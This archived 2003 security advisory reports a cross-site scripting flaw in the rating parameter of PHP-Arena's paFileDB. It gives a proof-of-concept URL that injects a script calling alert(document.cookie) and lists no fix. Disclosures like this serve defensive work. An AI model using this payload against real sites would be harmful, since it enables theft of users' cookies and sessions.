TUCoPS :: Web BBS :: etc :: a6091.htm

PHP-Arena XSS
26th Mar 2003 [SBWID-6091]
COMMAND

	PHP-Arena XSS

SYSTEMS AFFECTED

	PHP-Arena v?

PROBLEM

	Thanks to dEcKa [decka_trash@yahoo.com] kind advisory :
	
	The Example Is Like This. Its So Simple:-
	
	http://target/pafiledb/pafiledb.php?action=rate&id=1&rate=dorate&rating=[script] 
	
	Fast Example:-
	
	http://target/pafiledb/pafiledb.php?action=rate&id=1&rate=dorate&rating=<scr!pt>alert(document.cookie)</scr!pt> 
	
	Done. So Simple Rite. The Problem Is In paFileDB Management Script.

SOLUTION

	?

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2025 AOH